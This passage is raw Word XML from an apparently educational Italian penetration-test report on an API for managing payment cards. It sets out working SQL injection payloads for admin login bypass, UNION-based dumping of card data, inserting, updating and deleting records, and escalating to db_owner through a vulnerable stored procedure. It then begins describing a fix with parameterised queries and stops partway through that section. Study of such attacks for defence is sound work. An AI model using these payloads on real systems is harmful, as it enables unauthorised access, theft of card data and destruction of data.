        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:t>o provare a recuperare l’utente amministratore che aveva verosimilmente accesso a tutte le carte, o cmq provare a impersonare altri utenti provando a “indovinare” la username o creando un programma che con un dizionario di nomi facesse tentativi automatici.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A753F" w14:textId="6F008C4A" w:rsidR="006766AD" w:rsidRDefault="00802810">
      <w:r>
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> provato di nuovo a impersonare l’utente admin con la seguente query usando molte variazioni di ‘admin’.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ad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096BC5" w14:paraId="0BF99AF8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3610DCCF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 Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF3D2D5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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EC02DC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"username": "' or username = 'admin'--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04365E5C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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34CE97E2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74A5963C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F817389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###PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743A0C6F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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71FBEAF8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"username": "' or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nome_utente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'admin'--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6872149E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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8DDA38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01BAE30E" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A54415" w14:textId="7795E359" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Alla fine </w:t>
      </w:r>
      <w:r w:rsidR="002D7410">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ottenuto un token per l’utente ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sadm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’. Con questo utente </w:t>
      </w:r>
      <w:r w:rsidR="00DA69CC">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provato a recuperare le carte e sfruttando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> senza alcuna manipolazione </w:t>
      </w:r>
      <w:r w:rsidR="00DA69CC">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avuto accesso a tutte le carte in quanto l’amministratore poteva vederle tutte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431DC15" w14:textId="688E062F" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Avre</w:t>
      </w:r>
      <w:r w:rsidR="00A53DA3">
        <w:t>mmo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comunque potuto leggere tutte le carte usando una semplice tautologia o aggiungendo una union alla query.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae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9A3E78" w14:paraId="55F28873" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39369D9A" w14:textId="77777777" w:rsidR="009A3E78" w:rsidRPr="00096BC5" w:rsidRDefault="009A3E78" w:rsidP="009A3E78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###SQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D4E52D" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00000000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or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1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D68B721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11787A25" w14:textId="4265C103" w:rsidR="006766AD" w:rsidRPr="009A3E78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'; SELECT number, null,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expirydate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, 1, Issuer FROM cards</w:t>
            </w:r>
            <w:r w:rsidR="009A3E78">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="546987A8" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="009A3E78" w:rsidRDefault="006766AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8616BD" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Corruzione dei dati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06234148" w14:textId="6DE30FC4" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Andare a modificare i dati di una tabella una volta conosciuta la struttura diventa semplice usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piggybacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query. Sono riuscito a inserire una nuova carta, aggiornare una esistente e cancellarne una. Il tutto con l’utente amministratore che era l’unico ad avere i privilegi per eseguire queste operazioni. Contando che non c’erano dati </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>relativi ai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ruoli</w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> presupposto che la capacità di modificare dati fosse affidata all’utente ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sadm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ con un controllo direttamente nel codice.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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3F719E2B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46F20A0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';UPDATE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cards SET code='000'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E76B7A2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3B6F9193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';INSERT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INTO cards </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4230986F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(username, number, code,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expirydate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, issuer) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D54A09B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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>VALUES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A242B0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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">  ('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fr-FR"/>
              </w:rPr>
              <w:t>utente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fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">', '1234567890123456', '234', '2030-12-31', </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E50E6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fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'Mastercard')--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F65CB7F" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD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</w:p>
          <w:p w14:paraId="75C91D30" w14:textId="61770D2E" w:rsidR="006766AD" w:rsidRPr="009A3E78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'; DELETE cards WHERE number= '1234567890123456'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04CDBF67" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="6434757C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Corruzione della struttura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BF02F" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Quando si tratta di modificare la struttura del database, il problema è ottenere i privilegi per eseguire i comandi necessari. Se l’utente con cui gira l’applicazione è un utente con poteri di eseguire comandi DDL sul database, allora basta una query </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piggybacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> come visto per le modifiche dei valori di una tabella. Ma se così non è bisogna andare alla ricerca di eventuali backdoor lasciate aperte. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A289E" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">In SQL Server esiste la possibilità di creare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure che vengono eseguite con uno specifico utente del database. Se quell’utente ha privilegi superiori rispetto a quello usato per l’applicazione e se quella </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure è soggetta ad injection, si può sfruttare il comando per eseguire comandi malevoli o peggio ancora per elevare i privilegi dell’utente dell’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194524AB" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Il primo passo è quello di cercare se esistono </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure o funzioni con questa caratteristica sfruttando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delle carte per ottenere i dati. La seguente query ritorna le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure, e i loro parametri, che hanno privilegio di esecuzione come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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7562BDBF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9C83D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union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all </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B7AD97F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SELECT </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F6C9C8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SCHEMA_NAME(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)+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'-'+p.name, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A7E62F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null,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34365B76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'2001-01-01',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245F9529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1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01EA10D4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ISNULL(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par.name, 'np') + '-' +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B943AB5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ISNULL(TYPE_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NAME(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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par.user_type_id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), '') + '-' +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509CF33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CONVERT(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varchar,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ISNULL(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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par.max_length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, 0)) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302C78EB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FROM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sys.procedures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p </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35278D0A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sys.schemas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s </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495A7EEA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p.schema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AND s.name= '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dbo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' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC3BF62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LEFT JOIN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sys.parameters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par </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0391ED6B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par.object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AND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par.parameter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&gt; 0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104DDB0B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JOIN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sys.sql_modules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m </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D8FF2E" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left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 ON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p.object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m.object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_id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40C23472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m.execute</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>_as_principal_id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-2--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68163B66" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F1B15D" w14:textId="0837EA0A" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">La query ha restituito una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure di nome </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GetData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che prende in input un parametro stringa di nome </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tablename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Se il parametro venisse concatenato con una stringa SQL, si potrebbe tentare un attacco. </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quindi lanciato i seguenti comandi sempre sfruttando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delle carte per ottenere prima il nome dell’utente e poi per elevarne i privilegi a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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41FE83E5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2083"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2E198C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### Ottiene il nome dell’utente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5996E4C0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' UNION ALL SELECT USER_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>NAME(),null</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>,'2001-01-01',1,''--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD2923D" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0540E4A3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### Aumenta i privilegi dell’utente corrente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258FF6B7" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left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'; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New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dbo.getdata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'cards; ALTER ROLE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>db_owner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ADD MEMBER </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>appuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF8987C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C16C088" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="5E67B118" w14:textId="77777777" w:rsidR="008D7437" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Il secondo comando è particolare perché sfrutta la vulnerabilità </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e verifica se anche la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure è vulnerabile. Poiché la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedure è vulnerabile e gira con privilegi di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>siamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> riuscit</w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ad assegnare all’utente dell’applicazione il privilegio di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. A questo punto </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>siamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stat</w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in grado di fare un drop delle tabelle sia sfruttando la vulnerabilità di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GetData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, sia sfruttando la vulnerabilità </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE50129" w14:textId="1151D453" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00FC3C95">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigazione e Messa in Sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A8758" w14:textId="6272881A" w:rsidR="006766AD" w:rsidRDefault="004218B6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dopo aver portato con successo il nostro attacco, abbiamo cominciato a studiare le possibili contromisure. </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">Per neutralizzare gli attacchi descritti e garantire il ripristino dei requisiti CIA, </w:t>
      </w:r>
      <w:r>
        <w:t>siamo intervenuti</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> su due livelli: la </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>riscrittura del codice sorgente dell'applicazione (C#/.NET)</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> e la </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>restrizione dei privilegi a livello di Database</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D701C6" w14:textId="032F5F42" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00FC3C95">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_lsjitpy5g29u" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">Risoluzione della SQL Injection nel </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">odice </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>dell’applicazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BFBB7" w14:textId="4858D3D7" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La causa radice di tutte le injection riscontrate (sia l'autenticazione bypassata nel </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ogin, sia l'esfiltrazione/corruzione nella </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ista </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>arte) risiede nella concatenazione dinamica delle stringhe di input</w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t xml:space="preserve"> inserite dall’utente senza alcun controllo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La mitigazione consiste nell'adozione rigorosa delle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query Parametrizzate</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A4A62D" w14:textId="7B7AB683" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Grazie alla parametrizzazione, il database </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t xml:space="preserve">prima </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compila la query </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>e poi al posto dei parametri inserisce i valori inseriti dall’utente</w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t xml:space="preserve"> trattandoli come semplici dati e non come stringhe che possono essere mischiate con il codice SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t>Il risultato è che q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ualsiasi input maligno (apici, trattini di commento, comandi </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3C95">
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t xml:space="preserve"> e così via</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3C95">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t>non altera la query SQL ma solo i valori passati ai parametri</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87C837" w14:textId="05AA8342" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00FC3C95">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_8178jkf5mqbe" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">Messa in sicurezza dell'API di </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318C4D6" w14:textId="4602D57A" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>Il codice vulnerabile che effettuava la concatenazione è stato sostituito con l'uso dei parametri nativi di ADO.NET (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC3C95">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Parameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per SQL Server </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3C95">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC3C95">
        <w:rPr>
